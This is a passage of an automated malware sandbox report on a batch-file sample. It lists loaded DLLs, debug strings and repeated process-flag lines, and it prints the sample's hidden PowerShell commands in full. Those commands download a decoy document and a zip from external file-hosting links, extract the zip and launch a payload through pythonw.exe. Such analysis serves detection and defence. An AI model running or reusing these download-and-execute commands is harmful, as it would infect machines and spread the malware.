              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: e.pdb source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE272000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdbIKEhj source: powershell.exe, 0000000C.00000002.2256767486.000001D6D13F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n.pdb+ source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE21C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbv source: powershell.exe, 0000000C.00000002.2255607311.000001D6D1150000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32poration1)0' source: powershell.exe, 0000000E.00000002.2359824701.0000015FDE034000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdbtem32T source: powershell.exe, 0000000C.00000002.2256767486.000001D6D1412000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbSc" source: powershell.exe, 0000000C.00000002.2256767486.000001D6D13F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2255607311.000001D6D1150000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2473727057.0000022E35552000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2255607311.000001D6D1150000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2473727057.0000022E35552000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\System.Core.pdb source: powershell.exe, 0000000E.00000002.2359824701.0000015FDE054000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6?t.Automation.pdb source: powershell.exe, 0000000E.00000002.2359824701.0000015FDE054000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.pdb source: powershell.exe, 0000000C.00000002.2256767486.000001D6D13B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 6?m.pdbpdbtem.pdbtX source: powershell.exe, 0000000C.00000002.2256767486.000001D6D1412000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000C.00000002.2256767486.000001D6D13B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.pdb source: powershell.exe, 00000010.00000002.2473727057.0000022E35518000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdbpdblib.pdbQ source: powershell.exe, 00000010.00000002.2473727057.0000022E35552000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *e.pdb source: powershell.exe, 00000010.00000002.2473727057.0000022E35552000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE293000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Htem.pdbwas ma source: powershell.exe, 0000000C.00000002.2256767486.000001D6D1412000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbg source: powershell.exe, 00000010.00000002.2473727057.0000022E35552000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000010.00000002.2476951374.0000022E357DE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbe source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdba source: powershell.exe, 0000000E.00000002.2361463515.0000015FDE200000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected Abobus Obfuscator
              Source: Yara matchFile source: 13jhsfbose.bat, type: SAMPLE
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848CF7047 push esp; retf 12_2_00007FF848CF7048
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848CF59F2 pushad ; ret 14_2_00007FF848CF5A01
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848CF59B2 pushad ; ret 14_2_00007FF848CF5A01
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848DC0741 push eax; retf 14_2_00007FF848DC0761
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF848D800BD pushad ; iretd 16_2_00007FF848D800C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF848E523EC push 8B485F94h; iretd 16_2_00007FF848E523F1

              Persistence and Installation Behavior

              barindex
              Tries to download and execute files (via powershell)
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
